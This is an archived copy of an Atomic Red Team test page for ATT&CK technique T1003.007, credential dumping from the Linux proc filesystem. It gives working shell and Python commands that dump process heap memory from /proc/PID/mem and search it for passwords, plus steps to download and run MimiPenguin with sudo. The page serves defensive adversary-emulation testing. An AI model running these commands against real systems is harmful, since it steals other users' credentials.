{
	"id": "895af23e-1c45-496b-bdab-db95b4afed64",
	"created_at": "2026-04-06T00:11:33.566823Z",
	"updated_at": "2026-04-10T03:21:50.912379Z",
	"deleted_at": null,
	"sha1_hash": "8cbaf03f70ccd7039bb045297417e300acc10545",
	"title": "atomic-red-team/atomics/T1003.007/T1003.007.md at master · redcanaryco/atomic-red-team",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 87035,
	"plain_text": "atomic-red-team/atomics/T1003.007/T1003.007.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-05 18:20:30 UTC\r\nT1003.007 - OS Credential Dumping: Proc Filesystem\r\nDescription from ATT\u0026CK\r\nAdversaries may gather credentials from the proc filesystem or /proc . The proc filesystem is a\r\npseudo-filesystem used as an interface to kernel data structures for Linux based systems managing\r\nvirtual memory. For each process, the /proc/\u003cPID\u003e/maps file shows how memory is mapped within\r\nthe process’s virtual address space. And /proc/\u003cPID\u003e/mem , exposed for debugging purposes, provides\r\naccess to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung\r\nLinux proc map 2022)\r\nWhen executing with root privileges, adversaries can search these memory locations for all processes\r\non a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as\r\ngrep -E \"^[0-9a-f-]* r\" /proc/\"$pid\"/maps | cut -d' ' -f 1 , to look for fixed strings in memory\r\nstructures or cached hashes.(Citation: atomic-red proc file system) When running without privileged\r\naccess, processes can still view their own virtual memory locations. Some services or programs may\r\nsave credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)\r\n(Citation: Polop Linux PrivEsc Gitbook)\r\nIf running as or with the permissions of a web browser, a process can search the /maps \u0026 /mem\r\nlocations for common website credential patterns (that can also be used to find adjacent memory within\r\nthe same structure) in which hashes or cleartext credentials may be located.\r\nSource\r\nAtomic Tests\r\nAtomic Test #1: Dump individual process memory with sh (Local)\r\nAtomic Test #2: Dump individual process memory with sh on FreeBSD (Local)\r\nAtomic Test #3: Dump individual process memory with Python (Local)\r\nAtomic Test #4: Capture Passwords with MimiPenguin\r\nAtomic Test #1: Dump individual process memory with sh (Local)\r\nUsing /proc/$PID/mem , where $PID is the target process ID, use shell utilities to copy process memory to an\r\nexternal file so it can be searched or exfiltrated later.\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 1 of 7\n\nSupported Platforms: Linux\r\nauto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007.bin\r\nscript_path Path to script generating the target process path /tmp/T1003.007.sh\r\npid_term Unique string to use to identify target process string T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\r\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\r\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\r\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\r\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\r\ngrep -i \"PASS\" \"#{output_file}\"\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nAtomic Test #2: Dump individual process memory with sh on FreeBSD (Local)\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 2 of 7\n\nUsing /proc/$PID/mem , where $PID is the target process ID, use shell utilities to copy process memory to an\r\nexternal file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.\r\nSupported Platforms: Linux\r\nauto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007.bin\r\nscript_path Path to script generating the target process path /tmp/T1003.007.sh\r\npid_term Unique string to use to identify target process string T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\r\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\r\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\r\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\r\nstrings \"#{output_file}\" | grep -i PASS\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nAtomic Test #3: Dump individual process memory with Python (Local)\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 3 of 7\n\nUsing /proc/$PID/mem , where $PID is the target process ID, use a Python script to copy a process's heap\r\nmemory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.\r\nSupported Platforms: Linux\r\nauto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63\r\nInputs\r\nName Description Type Default Value\r\noutput_file\r\nPath where captured\r\nresults will be placed\r\npath /tmp/T1003.007.bin\r\nscript_path\r\nPath to script generating\r\nthe target process\r\npath /tmp/T1003.007.sh\r\npython_script\r\nPath to script generating\r\nthe target process\r\npath PathToAtomicsFolder/T1003.007/src/dump_heap.py\r\npid_term\r\nUnique string to use to\r\nidentify target process\r\nstring T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nPYTHON=$(which python || which python3 || which python2)\r\n$PYTHON #{python_script} $PID #{output_file}\r\ngrep -i \"PASS\" \"#{output_file}\"\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 4 of 7\n\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nDescription: Requires Python\r\nCheck Prereq Commands\r\n(which python || which python3 || which python2)\r\nGet Prereq Commands\r\necho \"Python 2.7+ or 3.4+ must be installed\"\r\nAtomic Test #4: Capture Passwords with MimiPenguin\r\nMimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system,\r\nMimiPenguin will retrieve passwords from memory and output them to a specified file. See\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\r\nSupported Platforms: Linux\r\nauto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c\r\nInputs\r\nName Description Type Default Value\r\noutput_file\r\nPath where captured\r\nresults will be placed\r\npath /tmp/T1003.007Test3.txt\r\nMimiPenguin_Location\r\nPath of MimiPenguin\r\nscript\r\npath\r\n/tmp/mimipenguin/mimipenguin_2.0-\r\nrelease/mimipenguin.sh\r\nAttack Commands: Run with bash ! Elevation Required (e.g. root or admin)\r\nsudo #{MimiPenguin_Location} \u003e #{output_file}\r\ncat #{output_file}\r\nCleanup Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 5 of 7\n\nrm -f #{output_file} \u003e /dev/null\r\nDependencies: Run with sh !\r\nDescription: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})\r\nCheck Prereq Commands\r\nif [ -f \"#{MimiPenguin_Location}\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nwget -O \"/tmp/mimipenguin.tar.gz\" https://github.com/huntergregal/mimipenguin/releases/download/2.0-\r\nmkdir /tmp/mimipenguin\r\ntar -xzvf \"/tmp/mimipenguin.tar.gz\" -C /tmp/mimipenguin\r\nDescription: Strings must be installed\r\nCheck Prereq Commands\r\nif [ -x \"$(command -v strings --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install binutils\r\nDescription: Python2 must be installed\r\nCheck Prereq Commands\r\nif [ -x \"$(command -v python2 --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install python2\r\nDescription: Libc-bin must be installed\r\nCheck Prereq Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 6 of 7\n\nif [ -x \"$(command -v ldd --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install libc-bin\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"
	],
	"report_names": [
		"T1003.007.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434293,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.pdf",
		"text": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.txt",
		"img": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.jpg"
	}
}